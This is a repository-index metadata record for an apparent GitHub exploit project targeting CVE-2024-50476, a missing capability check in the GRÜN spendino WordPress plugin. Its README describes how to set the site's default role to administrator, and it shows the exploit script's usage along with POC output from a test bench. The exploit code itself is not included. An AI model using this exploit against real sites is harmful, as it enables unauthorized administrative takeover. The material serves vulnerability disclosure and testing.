{"id":21125682,"url":"https://github.com/randomrobbiebf/cve-2024-50476","last_synced_at":"2026-04-27T17:05:32.809Z","repository":{"id":261030332,"uuid":"883044063","full_name":"RandomRobbieBF/CVE-2024-50476","owner":"RandomRobbieBF","description":"GRÜN spendino Spendenformular \u003c= 1.0.1 - Unauthenticated Arbitrary Options Update","archived":false,"fork":false,"pushed_at":"2024-11-04T09:32:16.000Z","size":5,"stargazers_count":0,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-09-22T14:02:25.593Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-11-04T09:30:36.000Z","updated_at":"2024-11-04T09:32:19.000Z","dependencies_parsed_at":"2024-11-04T10:40:44.381Z","dependency_job_id":null,"html_url":"https://github.com/RandomRobbieBF/CVE-2024-50476","commit_stats":null,"previous_names":["randomrobbiebf/cve-2024-50476"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/RandomRobbieBF/CVE-2024-50476","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-50476","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-50476/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-50476/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-50476/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2024-50476/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-50476/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32345900,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-26T23:26:28.701Z","status":"online","status_checked_at":"2026-04-27T02:00:06.769Z","response_time":128,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-20T04:36:21.056Z","updated_at":"2026-04-27T17:05:32.777Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2024-50476\nGRÜN spendino Spendenformular \u0026lt;= 1.0.1 - Unauthenticated Arbitrary Options Update\n\n# Description:\nThe GRÜN spendino Spendenformular – Mehr Spenden! Weniger Arbeit! plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check in all versions up to, and including, 1.0.1. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.\n\n\n```\nPublished: 2024-10-25 00:00:00\nCVE: CVE-2024-50476\nCVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\nCVSS Score: 9.8\nSlugs: spendino\n```\n\nHow to use\n---\n\n```\n$ python3 CVE-2024-50476.py -h\nusage: CVE-2024-50476.py [-h] -u URL [-f FIX]\n\nCVE-2024-50476 | GRÜN spendino Spendenformular \u003c= 1.0.1 - Unauthenticated Arbitrary Options Update The GRÜN spendino Spendenformular – Mehr Spenden! Weniger Arbeit! plugin for WordPress is vulnerable to unauthorized modification of data that\ncan lead to privilege escalation due to a missing capability check in all versions up to, and including, 1.0.1. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to\nupdate the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.\n\noptions:\n  -h, --help         show this help message and exit\n  -u URL, --url URL  Website URL\n  -f FIX, --fix FIX  Reset after Exploit\n```\n\n\nPOC\n---\n\n```\n$ python3 CVE-2024-50476.py -u https://wpscan-vulnerability-test-bench.ddev.site\nVulnerability check: https://wpscan-vulnerability-test-bench.ddev.site\nOption set successfully: https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php\nYou can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.\nOption set successfully: https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php\nYou can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-50476","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2024-50476","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-50476/lists"}